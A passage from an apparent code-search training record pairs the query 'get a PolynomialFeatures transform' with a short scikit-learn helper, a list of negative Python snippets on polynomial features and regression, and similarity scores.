maxcomp = None):\n img = data[:,2:].T\n size = np.sqrt(img.shape[0])\n pca = PCA(n_components=20)\n imgBasis = pca.fit_transform(img)\n nimg = img.shape[1]" ]
[ "0.76003706", "0.74183345", "0.73857856", "0.73070925", "0.7215321", "0.7163089", "0.7066037", "0.7064292", "0.7050474", "0.7049609", "0.70191026", "0.7006228", "0.6999517", "0.6968802", "0.6924137", "0.68874854", "0.6884852", "0.68622917", "0.67792535", "0.6774958", "0.67328346", "0.6731503", "0.67106754", "0.6646318", "0.66424024", "0.6629324", "0.6629324", "0.66278887", "0.6620293", "0.656829", "0.6568242", "0.65431094", "0.64816594", "0.64641756", "0.6462149", "0.64621353", "0.64593846", "0.6445568", "0.64274436", "0.6423294", "0.64142644", "0.6400075", "0.6375266", "0.6355939", "0.6342307", "0.633416", "0.62999135", "0.62969387", "0.6288508", "0.6285619", "0.62753546", "0.6267883", "0.6249952", "0.6171575", "0.6133782", "0.61015755", "0.60853547", "0.6080211", "0.6041711", "0.6033251", "0.60299796", "0.60087633", "0.5995187", "0.5993922", "0.59525", "0.5931811", "0.5922845", "0.59215707", "0.59067136", "0.58946884", "0.58754206", "0.58510256", "0.58284557", "0.582486", "0.582463", "0.5822558", "0.57833594", "0.57742107", "0.5755756", "0.57553977", "0.575462", "0.5740764", "0.5738497", "0.57147545", "0.57127637", "0.5700029", "0.5676018", "0.5673367", "0.5657765", "0.5651388", "0.5643576", "0.5641714", "0.563302", "0.5632618", "0.56120235", "0.559947", "0.5590898", "0.55902016", "0.55848026", "0.557837" ]
0.84510195
0
get a PolynomialFeatures transform
def get_poly(kwargs): from sklearn.preprocessing import PolynomialFeatures return PolynomialFeatures(**kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def generate_polynomial_features(self, X) :\n\n n,d = X.shape\n\n ### ========== TODO : START ========== ###\n # part b: modify to create matrix for simple linear model\n # part g: modify to create matrix for polynomial model\n Phi = X\n m = self.m_\n\n if m == 1:\n Phi = np.zeros((n,2))\n for i in range(n):\n Phi[i,0] = 1\n Phi[i, 1] = X[i]\n\n else:\n Phi = np.ones((n,m+1))#n*m+1 dimmension\n power_arr = np.arange(0, m+1)\n for index, row in enumerate(Phi):# get every row\n row = np.repeat(X[index],m+1)\n row = np.power(row,power_arr)\n Phi [index,] = row\n #also could use the following\n \"\"\"\n import sklearn.preprocessing as sk\n #X is a N*1 vector\n poly_mat = sk.PolynomialFeatures(3)\n poly.fit_transform(a)\n \"\"\"\n\n\n\n\n\n ### ========== TODO : END ========== ###\n\n return Phi", "def polyfeatures(self, X, degree):\n #TODO\n \n for d in range(2,degree+1):\n X = np.append(X,X[:,[0]]**d,1)\n \n return X", "def polyFeat(X, p):\r\n # You need to return the following variables correctly.\r\n X_poly = np.zeros((X.shape[0], p))\r\n\r\n # ====================== YOUR CODE HERE ======================\r\n\r\n for i in range(p):\r\n X_poly[:, i] = X[:, 0] ** (i + 1)\r\n\r\n # ============================================================\r\n return X_poly", "def _make_features(self, x):\n\t\tx = x.unsqueeze(1)\n\t\treturn torch.cat([x ** i for i in range(1, self._degree+1)], 1)", "def make_features(x):\n x = x.unsqueeze(1)\n # torch.cat 实现tensor拼接\n return torch.cat([x ** i for i in range(1, POLY_DEGREE + 1)], 1)", "def build_poly_by_feature(tx, degrees):\n poly_tempt = np.ones([tx.shape[0],1])\n for idx, degree in enumerate(degrees):\n feature_poly = build_poly(tx[:,idx], int(degree))\n poly_tempt = np.c_[poly_tempt, feature_poly[:,1:]]\n return poly_tempt", "def build_poly(x, degree):\n \"\"\"\n Assemble the 3 label vectors with the original ordering \n Inputs:\n - x (ndarray) : binary prediction for set 1\n - degree (int) : binary prediction for set 2 \n Outputs: \n - p (ndarray) : predicted labels for test set ( with the original ordering)\n \"\"\"\n # forming a matrix containing the data points\n terms = np.hstack([np.ones([x.shape[0],1]),np.tile(x,(1,degree))])\n index = np.arange(degree)+1\n \n # forming a matrix contnaining the exponents\n exponents = np.multiply(np.ones((1, x.shape[1])), index[:, np.newaxis])\n exponents = exponents.reshape([1, x.shape[1]*degree])\n exponents = np.multiply(exponents, np.ones([x.shape[0], 1]))\n exponents = np.hstack([np.ones( (x.shape[0], 1) ),exponents])\n \n # using the exponent matrix as the element-wise exponents of the terms in the terms matrix\n p=np.power(terms,exponents)\n return p", "def feature_extraction(self) -> None:\n # Add the hour, minute, and x column to the data\n self.df_poly[\"hour\"] = self.df_poly[\"time\"].apply(lambda y: y.hour)\n self.df_poly[\"minute\"] = self.df_poly[\"time\"].apply(lambda y: y.minute)\n self.df_poly[\"x\"] = self.df_poly[\"hour\"] * 60 + self.df_poly[\"minute\"]\n\n # Empty list to hold the feature names\n poly_feature_names = []\n\n # Add the poly columns to the df_poly\n for degree in [0, 1, 2, 3, 4, 5]:\n self.df_poly = poly(self.df_poly, degree)\n poly_feature_names.append(\"poly_\" + str(degree))\n\n # filterout + - inf, nan\n self.df_poly = self.df_poly[\n ~self.df_poly.isin([np.nan, np.inf, -np.inf]).any(1)\n ]\n\n # Save the poly feature name\n self.poly_feature_names = poly_feature_names\n feature_names = []\n\n #########################################################################################\n train_index_poly = self.df_poly[\n ~self.df_poly.isin([np.nan, np.inf, -np.inf]).any(1)\n ].index\n X_train_poly, y_train_poly = (\n self.df_poly[self.poly_feature_names].loc[train_index_poly],\n self.df_poly[\"y\"].loc[train_index_poly],\n )\n\n # Build the Polynomial Regression Model\n lin_reg = LinearRegression()\n lin_reg.fit(X_train_poly, y_train_poly)\n self.poly_model = lin_reg\n y_train_season = lin_reg.predict(X_train_poly)\n self.y_train_season_obj = y_train_season\n #########################################################################################\n\n for n in [10, 15, 20, 25, 30]:\n self.df = MOM(self.df, n)\n feature_names.append(\"MOM_\" + str(n))\n for n in [10, 15, 20, 25, 30]:\n self.df = ROC(self.df, n)\n feature_names.append(\"ROC_\" + str(n))\n for n in [1, 2, 3, 4, 5]:\n self.df = LAG(self.df, n)\n feature_names.append(\"LAG_\" + str(n))\n for n in [10, 20, 30]:\n self.df = MA(self.df, n)\n feature_names.append(\"MA_\" + str(n))\n\n self.df = self.df[\n ~self.df.isin([np.nan, np.inf, -np.inf]).any(1)\n ] # filterout + - inf, nan\n self.feature_names = feature_names", "def polynomial_basis(X, degree):\n n_samples, n_features = X.shape\n\n # The number of monomials is (n + d) choose d\n n_monomials = int(factorial(n_features + degree)/(factorial(n_features)*factorial(degree)))\n features = np.ones((n_monomials, n_samples))\n col = 1\n x_T = X.T\n\n for deg in range(1, degree + 1):\n for combs in combinations_with_replacement(x_T, deg):\n features[col, :] = reduce(lambda x, y: x * y, combs)\n col += 1\n return features.T", "def toyData(w,sigma,N): \n #Degree of polynomial \n degree=w.size; \n \n #generate x values \n x=np.linspace(0, 1,N);\n \n poly=preprocessing.PolynomialFeatures(degree-1,include_bias=True)\n \n PHI=poly.fit_transform(x.reshape(N,1)) \n \n y=np.dot(PHI,w);\n \n target=y+np.random.normal(0, sigma, N);\n \n Out=[x,y,PHI, target]\n\n return Out", "def map_feature(x):\n m, n = x.shape\n out = x\n\n # Add quodratic features.\n for i in range(n):\n for j in range(i, n):\n out = hstack((out, x[:, i].reshape(m, 1) * x[:, j].reshape(m, 1)))\n\n # Add cubic features.\n for i in range(n):\n for j in range(i, n):\n for k in range(j, n):\n out = hstack(\n (out, x[:, i].reshape(m, 1) * x[:, j].reshape(m, 1) * x[:, k].reshape(m, 1)))\n return out", "def add_polynomial_features(x, power):\n if type(power) is int and type(x) is np.ndarray:\n return np.concatenate([x**i for i in range(1, power+1)], axis=1)\n return None", "def polytrans(features,features_test,features_oos,poly): \n \n features['FEMA_21'] = poly.fit_transform(np.nan_to_num(features.FEMA_21.astype(np.float32)).reshape(-1, 1))\n features['FEMA_8'] = poly.fit_transform(np.nan_to_num(features.FEMA_8.astype(np.float32)).reshape(-1, 1))\n features['FADRLo'] = poly.fit_transform(np.nan_to_num(features.FADRLo.astype(np.float32)).reshape(-1, 1))\n features['FADRHi'] = poly.fit_transform(np.nan_to_num(features.FADRHi.astype(np.float32)).reshape(-1, 1))\n features['FRVI40'] = poly.fit_transform(np.nan_to_num(features.FRVI40.astype(np.float32)).reshape(-1, 1))\n features['FRVI60'] = poly.fit_transform(np.nan_to_num(features.FRVI60.astype(np.float32)).reshape(-1, 1))\n features['FONLOSMA5'] = poly.fit_transform(np.nan_to_num(features.FONLOSMA5.astype(np.float32)).reshape(-1, 1))\n features['FONHISMA5'] = poly.fit_transform(np.nan_to_num(features.FONHISMA5.astype(np.float32)).reshape(-1, 1))\n features['FONLOSMA21'] = poly.fit_transform(np.nan_to_num(features.FONLOSMA21.astype(np.float32)).reshape(-1, 1))\n features['FONHISMA21'] = poly.fit_transform(np.nan_to_num(features.FONHISMA21.astype(np.float32)).reshape(-1, 1))\n features['FONLOSMA34'] = poly.fit_transform(np.nan_to_num(features.FONLOSMA34.astype(np.float32)).reshape(-1, 1))\n features['FSBGAMMA'] = poly.fit_transform(np.nan_to_num(features.FSBGAMMA.astype(np.float32)).reshape(-1, 1))\n features['FOPENWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FOPENWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FHIGHWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FHIGHWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FLOWWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FLOWWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FCLOSEWEEKLY'] = poly.fit_transform(np.nan_to_num(features.FCLOSEWEEKLY.astype(np.float32)).reshape(-1, 1))\n features['FOPENDAILY'] = poly.fit_transform(np.nan_to_num(features.FOPENDAILY.astype(np.float32)).reshape(-1, 1))\n features['FHIGHDAILY'] = poly.fit_transform(np.nan_to_num(features.FHIGHDAILY.astype(np.float32)).reshape(-1, 1))\n features['FLOWDAILY'] = poly.fit_transform(np.nan_to_num(features.FLOWDAILY.astype(np.float32)).reshape(-1, 1))\n features['FCLOSEDAILY'] = poly.fit_transform(np.nan_to_num(features.FCLOSEDAILY.astype(np.float32)).reshape(-1, 1))\n features['FOPENHOURLY'] = poly.fit_transform(np.nan_to_num(features.FOPENHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FHIGHHOURLY'] = poly.fit_transform(np.nan_to_num(features.FHIGHHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FLOWHOURLY'] = poly.fit_transform(np.nan_to_num(features.FLOWHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FCLOSEHOURLY'] = poly.fit_transform(np.nan_to_num(features.FCLOSEHOURLY.astype(np.float32)).reshape(-1, 1))\n features['FSMA200'] = poly.fit_transform(np.nan_to_num(features.FSMA200.astype(np.float32)).reshape(-1, 1))\n features['FBOLUP20'] = poly.fit_transform(np.nan_to_num(features.FBOLUP20.astype(np.float32)).reshape(-1, 1))\n features['FPP'] = poly.fit_transform(np.nan_to_num(features.FPP.astype(np.float32)).reshape(-1, 1))\n features['FS38'] = poly.fit_transform(np.nan_to_num(features.FS38.astype(np.float32)).reshape(-1, 1))\n features['FS62'] = poly.fit_transform(np.nan_to_num(features.FS62.astype(np.float32)).reshape(-1, 1))\n features['FS100'] = poly.fit_transform(np.nan_to_num(features.FS100.astype(np.float32)).reshape(-1, 1))\n features['FS138'] = poly.fit_transform(np.nan_to_num(features.FS138.astype(np.float32)).reshape(-1, 1))\n features['FR162'] = poly.fit_transform(np.nan_to_num(features.FS162.astype(np.float32)).reshape(-1, 1))\n features['FS200'] = poly.fit_transform(np.nan_to_num(features.FS200.astype(np.float32)).reshape(-1, 1))\n features['FR38'] = poly.fit_transform(np.nan_to_num(features.FR38.astype(np.float32)).reshape(-1, 1))\n features['FR62'] = poly.fit_transform(np.nan_to_num(features.FR62.astype(np.float32)).reshape(-1, 1))\n features['FR100'] = poly.fit_transform(np.nan_to_num(features.FR100.astype(np.float32)).reshape(-1, 1))\n features['FR138'] = poly.fit_transform(np.nan_to_num(features.FR138.astype(np.float32)).reshape(-1, 1))\n features['FR162'] = poly.fit_transform(np.nan_to_num(features.FR162.astype(np.float32)).reshape(-1, 1))\n features['FR200'] = poly.fit_transform(np.nan_to_num(features.FR200.astype(np.float32)).reshape(-1, 1))\n features['SBATR'] = poly.fit_transform(np.nan_to_num(features.SBATR.astype(np.float32)).reshape(-1, 1))\n \n features_test['FEMA_21'] = poly.fit_transform(np.nan_to_num(features_test.FEMA_21.astype(np.float32)).reshape(-1, 1))\n features_test['FEMA_8'] = poly.fit_transform(np.nan_to_num(features_test.FEMA_8.astype(np.float32)).reshape(-1, 1))\n features_test['FADRLo'] = poly.fit_transform(np.nan_to_num(features_test.FADRLo.astype(np.float32)).reshape(-1, 1))\n features_test['FADRHi'] = poly.fit_transform(np.nan_to_num(features_test.FADRHi.astype(np.float32)).reshape(-1, 1))\n features_test['FRVI40'] = poly.fit_transform(np.nan_to_num(features_test.FRVI40.astype(np.float32)).reshape(-1, 1))\n features_test['FRVI60'] = poly.fit_transform(np.nan_to_num(features_test.FRVI60.astype(np.float32)).reshape(-1, 1))\n features_test['FONLOSMA5'] = poly.fit_transform(np.nan_to_num(features_test.FONLOSMA5.astype(np.float32)).reshape(-1, 1))\n features_test['FONHISMA5'] = poly.fit_transform(np.nan_to_num(features_test.FONHISMA5.astype(np.float32)).reshape(-1, 1))\n features_test['FONLOSMA21'] = poly.fit_transform(np.nan_to_num(features_test.FONLOSMA21.astype(np.float32)).reshape(-1, 1))\n features_test['FONHISMA21'] = poly.fit_transform(np.nan_to_num(features_test.FONHISMA21.astype(np.float32)).reshape(-1, 1))\n features_test['FONLOSMA34'] = poly.fit_transform(np.nan_to_num(features_test.FONLOSMA34.astype(np.float32)).reshape(-1, 1))\n features_test['FSBGAMMA'] = poly.fit_transform(np.nan_to_num(features_test.FSBGAMMA.astype(np.float32)).reshape(-1, 1))\n features_test['FOPENWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FOPENWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FHIGHWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FHIGHWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FLOWWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FLOWWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FCLOSEWEEKLY'] = poly.fit_transform(np.nan_to_num(features_test.FCLOSEWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_test['FOPENDAILY'] = poly.fit_transform(np.nan_to_num(features_test.FOPENDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FHIGHDAILY'] = poly.fit_transform(np.nan_to_num(features_test.FHIGHDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FLOWDAILY'] = poly.fit_transform(np.nan_to_num(features_test.FLOWDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FCLOSEDAILY'] = poly.fit_transform(np.nan_to_num(features_test.FCLOSEDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FOPENHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FOPENHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FHIGHHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FHIGHHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FLOWHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FLOWHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FCLOSEHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FCLOSEHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FSMA200'] = poly.fit_transform(np.nan_to_num(features_test.FSMA200.astype(np.float32)).reshape(-1, 1))\n features_test['FBOLUP20'] = poly.fit_transform(np.nan_to_num(features_test.FBOLUP20.astype(np.float32)).reshape(-1, 1))\n features_test['FPP'] = poly.fit_transform(np.nan_to_num(features_test.FPP.astype(np.float32)).reshape(-1, 1))\n features_test['FS38'] = poly.fit_transform(np.nan_to_num(features_test.FS38.astype(np.float32)).reshape(-1, 1))\n features_test['FS62'] = poly.fit_transform(np.nan_to_num(features_test.FS62.astype(np.float32)).reshape(-1, 1))\n features_test['FS100'] = poly.fit_transform(np.nan_to_num(features_test.FS100.astype(np.float32)).reshape(-1, 1))\n features_test['FS138'] = poly.fit_transform(np.nan_to_num(features_test.FS138.astype(np.float32)).reshape(-1, 1))\n features_test['FR162'] = poly.fit_transform(np.nan_to_num(features_test.FS162.astype(np.float32)).reshape(-1, 1))\n features_test['FS200'] = poly.fit_transform(np.nan_to_num(features_test.FS200.astype(np.float32)).reshape(-1, 1))\n features_test['FR38'] = poly.fit_transform(np.nan_to_num(features_test.FR38.astype(np.float32)).reshape(-1, 1))\n features_test['FR62'] = poly.fit_transform(np.nan_to_num(features_test.FR62.astype(np.float32)).reshape(-1, 1))\n features_test['FR100'] = poly.fit_transform(np.nan_to_num(features_test.FR100.astype(np.float32)).reshape(-1, 1))\n features_test['FR138'] = poly.fit_transform(np.nan_to_num(features_test.FR138.astype(np.float32)).reshape(-1, 1))\n features_test['FR162'] = poly.fit_transform(np.nan_to_num(features_test.FR162.astype(np.float32)).reshape(-1, 1))\n features_test['FR200'] = poly.fit_transform(np.nan_to_num(features_test.FR200.astype(np.float32)).reshape(-1, 1))\n features_test['SBATR'] = poly.fit_transform(np.nan_to_num(features_test.SBATR.astype(np.float32)).reshape(-1, 1))\n\n features_oos['FEMA_21'] = poly.fit_transform(np.nan_to_num(features_oos.FEMA_21.astype(np.float32)).reshape(-1, 1))\n features_oos['FEMA_8'] = poly.fit_transform(np.nan_to_num(features_oos.FEMA_8.astype(np.float32)).reshape(-1, 1))\n features_oos['FADRLo'] = poly.fit_transform(np.nan_to_num(features_oos.FADRLo.astype(np.float32)).reshape(-1, 1))\n features_oos['FADRHi'] = poly.fit_transform(np.nan_to_num(features_oos.FADRHi.astype(np.float32)).reshape(-1, 1))\n features_oos['FRVI40'] = poly.fit_transform(np.nan_to_num(features_oos.FRVI40.astype(np.float32)).reshape(-1, 1))\n features_oos['FRVI60'] = poly.fit_transform(np.nan_to_num(features_oos.FRVI60.astype(np.float32)).reshape(-1, 1))\n features_oos['FONLOSMA5'] = poly.fit_transform(np.nan_to_num(features_oos.FONLOSMA5.astype(np.float32)).reshape(-1, 1))\n features_oos['FONHISMA5'] = poly.fit_transform(np.nan_to_num(features_oos.FONHISMA5.astype(np.float32)).reshape(-1, 1))\n features_oos['FONLOSMA21'] = poly.fit_transform(np.nan_to_num(features_oos.FONLOSMA21.astype(np.float32)).reshape(-1, 1))\n features_oos['FONHISMA21'] = poly.fit_transform(np.nan_to_num(features_oos.FONHISMA21.astype(np.float32)).reshape(-1, 1))\n features_oos['FONLOSMA34'] = poly.fit_transform(np.nan_to_num(features_oos.FONLOSMA34.astype(np.float32)).reshape(-1, 1))\n features_oos['FSBGAMMA'] = poly.fit_transform(np.nan_to_num(features_oos.FSBGAMMA.astype(np.float32)).reshape(-1, 1))\n features_oos['FOPENWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FOPENWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FHIGHWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FHIGHWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FLOWWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FLOWWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FCLOSEWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FCLOSEWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FOPENDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FOPENDAILY.astype(np.float32)).reshape(-1, 1))\n features_oos['FHIGHDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FHIGHDAILY.astype(np.float32)).reshape(-1, 1))\n features_oos['FLOWDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FLOWDAILY.astype(np.float32)).reshape(-1, 1))\n features_oos['FCLOSEDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FCLOSEDAILY.astype(np.float32)).reshape(-1, 1))\n features_oos['FOPENHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FOPENHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FHIGHHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FHIGHHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FLOWHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FLOWHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FCLOSEHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FCLOSEHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FSMA200'] = poly.fit_transform(np.nan_to_num(features_oos.FSMA200.astype(np.float32)).reshape(-1, 1))\n features_oos['FBOLUP20'] = poly.fit_transform(np.nan_to_num(features_oos.FBOLUP20.astype(np.float32)).reshape(-1, 1))\n features_oos['FPP'] = poly.fit_transform(np.nan_to_num(features_oos.FPP.astype(np.float32)).reshape(-1, 1))\n features_oos['FS38'] = poly.fit_transform(np.nan_to_num(features_oos.FS38.astype(np.float32)).reshape(-1, 1))\n features_oos['FS62'] = poly.fit_transform(np.nan_to_num(features_oos.FS62.astype(np.float32)).reshape(-1, 1))\n features_oos['FS100'] = poly.fit_transform(np.nan_to_num(features_oos.FS100.astype(np.float32)).reshape(-1, 1))\n features_oos['FS138'] = poly.fit_transform(np.nan_to_num(features_oos.FS138.astype(np.float32)).reshape(-1, 1))\n features_oos['FR162'] = poly.fit_transform(np.nan_to_num(features_oos.FS162.astype(np.float32)).reshape(-1, 1))\n features_oos['FS200'] = poly.fit_transform(np.nan_to_num(features_oos.FS200.astype(np.float32)).reshape(-1, 1))\n features_oos['FR38'] = poly.fit_transform(np.nan_to_num(features_oos.FR38.astype(np.float32)).reshape(-1, 1))\n features_oos['FR62'] = poly.fit_transform(np.nan_to_num(features_oos.FR62.astype(np.float32)).reshape(-1, 1))\n features_oos['FR100'] = poly.fit_transform(np.nan_to_num(features_oos.FR100.astype(np.float32)).reshape(-1, 1))\n features_oos['FR138'] = poly.fit_transform(np.nan_to_num(features_oos.FR138.astype(np.float32)).reshape(-1, 1))\n features_oos['FR162'] = poly.fit_transform(np.nan_to_num(features_oos.FR162.astype(np.float32)).reshape(-1, 1))\n features_oos['FR200'] = poly.fit_transform(np.nan_to_num(features_oos.FR200.astype(np.float32)).reshape(-1, 1))\n features_oos['SBATR'] = poly.fit_transform(np.nan_to_num(features_oos.SBATR.astype(np.float32)).reshape(-1, 1))\n\n return(features,features_test,features_oos)", "def load_poly_features(df_train, df_test):\n logger = logging.getLogger(__name__)\n logger.debug('Loading polynomial features..')\n # Make a new dataframe for polynomial features\n poly_features = df_train[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'DAYS_BIRTH']]\n poly_features_test = df_test[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'DAYS_BIRTH']]\n\n # imputer for handling missing values\n imputer = Imputer(strategy='median')\n\n # Need to impute missing values\n poly_features = imputer.fit_transform(poly_features)\n poly_features_test = imputer.transform(poly_features_test)\n\n # Create the polynomial object with specified degree\n poly_transformer = PolynomialFeatures(degree=3)\n # Train the polynomial features\n poly_transformer.fit(poly_features)\n\n # Transform the features\n poly_features = poly_transformer.transform(poly_features)\n poly_features_test = poly_transformer.transform(poly_features_test)\n logger.debug('Polynomial Features shape: %s' % str(poly_features.shape))\n\n df_poly_features = pd.DataFrame(poly_features,\n columns=poly_transformer.get_feature_names(['EXT_SOURCE_1', 'EXT_SOURCE_2',\n 'EXT_SOURCE_3', 'DAYS_BIRTH']))\n df_poly_features_test = pd.DataFrame(poly_features_test,\n columns=poly_transformer.get_feature_names(['EXT_SOURCE_1', 'EXT_SOURCE_2',\n 'EXT_SOURCE_3', 'DAYS_BIRTH']))\n df_poly_features['SK_ID_CURR'] = df_train['SK_ID_CURR']\n df_poly_features_test['SK_ID_CURR'] = df_test['SK_ID_CURR']\n logger.info('Loaded polynomial features')\n return df_poly_features, df_poly_features_test", "def transform_data(features):\n\n def cart2pol(my_row):\n x = my_row[0]\n y = my_row[1]\n rho = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y, x)\n return [rho, phi]\n\n #vfunc = np.vectorize(cart2pol)\n #transformed = vfunc(features)\n out = []\n #print(features, \"\\n\\n\")\n for row in features:\n out.append(cart2pol(row))\n out = np.array(out)\n #print(\"out is\\n\", out)\n \"\"\"\n x = out[:,0]\n y = out[:,1]\n \n plt.scatter(x,y)\n plt.show()\n \"\"\"\n return out", "def generate_coefficients_data(poly_degree: int, performance_data: pd.DataFrame, param_columns: typing.List) -> pd.DataFrame:\n if poly_degree != 2:\n logging.warning('Not Implemented: polynomial degree of > 2. Will use degree 2 for meta-model')\n coef_names = get_coefficient_names()\n results = []\n for idx, task_id in enumerate(performance_data['task_id'].unique()):\n frame_task = performance_data.loc[performance_data['task_id'] == task_id]\n model = sklearn.linear_model.LinearRegression(fit_intercept=False)\n poly_feat = sklearn.preprocessing.PolynomialFeatures(2)\n X = poly_feat.fit_transform(frame_task[param_columns])\n y = frame_task['predictive_accuracy']\n model.fit(X, y)\n result = {\n 'task_id': task_id,\n coef_names[0]: model.coef_[0],\n coef_names[1]: model.coef_[1],\n coef_names[2]: model.coef_[2],\n coef_names[3]: model.coef_[3],\n coef_names[4]: model.coef_[4],\n coef_names[5]: model.coef_[5],\n }\n results.append(result)\n return pd.DataFrame(results).set_index('task_id')", "def predict(self, X) :\n if self.coef_ is None :\n raise Exception(\"Model not initialized. Perform a fit first.\")\n\n X = self.generate_polynomial_features(X) # map features\n\n ### ========== TODO : START ========== ###\n # part c: predict y\n # for this we first get the single value of feature vector, then X in the transposed form and then we have to multiply by Theta\n\n y = np.dot(X, self.coef_)#coef is the coef matrix\n ### ========== TODO : END ========== ###\n\n\n return y", "def expand_features(x, degree):\n N = x.shape[0]\n D = x.shape[1]\n \n # Matrix to be returned\n phi = np.ones((N, 1))\n # Holds X^deg\n xdeg = np.ones((N, D))\n for deg in range (1,degree+1) :\n xdeg *= x\n phi = np.c_[phi, xdeg] \n \n return phi", "def build_poly(x, degree): \n # ***************************************************\n # COPY YOUR CODE FROM EX03 HERE\n # polynomial basis function: TODO\n # this function should return the matrix formed\n # by applying the polynomial basis to the input data\n # ***************************************************\n raise NotImplementedError", "def build_poly(x, degree):\n \n X = np.vander((x[:,0]).T, degree+1, increasing=True)\n \n for i in range(1,np.shape(x)[1],1):\n feat = (x[:,i]).T\n vander = np.vander(feat, degree+1, increasing=True)\n #remove the column of 1 at the beginning of each vander\n vander = np.delete(vander, 0,axis = 1)\n #concatenation\n X = np.concatenate((X, vander), axis=1)\n \n return X", "def build_poly(x, degree):\n phi = np.ones(len(x))\n phi = np.vstack((phi, [x**(j+1) for j in range(degree)]))\n \n return phi.T", "def polynomial_variables(self):\n return self._polynomial_variables", "def poly_regression(self,precision=8):\n # return empty lists if input is empty\n if self.training == []:\n return [],[]\n\n latitudes = []\n longitudes = []\n for point in self.training[:-1]:\n latitudes.append(point[0])\n longitudes.append(point[1]) \n # store everything in a dataframe\n latDf = pd.DataFrame(numpy.array(latitudes), columns=['latitudes'])\n longDf = pd.DataFrame(numpy.array(longitudes), columns=['longitudes'])\n\n # learn how to do regression\n reg = linear_model.LinearRegression()\n\n # pass the order of your polynomial here \n poly = PolynomialFeatures(precision)\n\n \n # regression with latitude as domain\n vertical_predicted_path = []\n transform = poly.fit_transform(longDf)\n\n reg.fit(transform,latDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n vertical_predicted_path.append([predictions[i][0],longDf[\"longitudes\"][i]])\n\n \n # regression with longitude domain\n horizontal_predicted_path = []\n transform = poly.fit_transform(latDf)\n\n reg.fit(transform,longDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n horizontal_predicted_path.append([latDf[\"latitudes\"][i], predictions[i][0]])\n\n self.horizontal = sorted(horizontal_predicted_path, key=lambda k: [k[1], k[0]])\n self.vertical = sorted(vertical_predicted_path, key=lambda k: [k[0], k[1]])\n \n # return sorted horizontal and vertical prediction\n return self.horizontal, self.vertical", "def build_poly(x, degree):\n tx = np.zeros((x.shape[0], x.shape[1]*(degree+1)))\n \n for j in range(degree+1):\n tx[:,x.shape[1]*j:x.shape[1]*(j+1)] = np.power(x,j)\n \n return tx", "def __getPolynomial(self) -> 'func':\n return lambda x: sum(self.pts[i]*base(x)\n for i, base in enumerate(self.basis))", "def get_conv_features(self, X):\n convfeatures = blah\n return convfeatures", "def feature_map(self, x):\n if not self.use_resnet:\n return self.features(x)\n x = self.features.conv1(x)\n x = self.features.bn1(x)\n x = self.features.relu(x)\n x = self.features.maxpool(x)\n c2 = self.features.layer1(x)\n c3 = self.features.layer2(c2)\n c4 = self.features.layer3(c3)\n return c4", "def yy(x):\r\n return Feature(x, \"YY\")", "def zz(x):\r\n return Feature(x, \"ZZ\")", "def _create_ploynomial_array(self, coeff, x):\n xarr = numpy.array(x)\n yarr = numpy.zeros(len(xarr))\n for idim in range(len(coeff)):\n ai = coeff[idim]\n yarr += ai*xarr**idim\n return yarr", "def _transform_fn(features, mode):\n\t\tprint('Before feature transform_fn')\n\t\tfor k in features:\n\t\t\tprint(features[k].shape)\n\t\tcontext_features, example_features = feature_lib.encode_listwise_features(\n\t\t\t\tfeatures,\n\t\t\t\tinput_size=input_size,\n\t\t\t\tcontext_feature_columns=context_feature_columns,\n\t\t\t\texample_feature_columns=example_feature_columns,\n\t\t\t\tmode=mode)\n\t\tprint('After feature transform_fn')\n\t\tfor k in 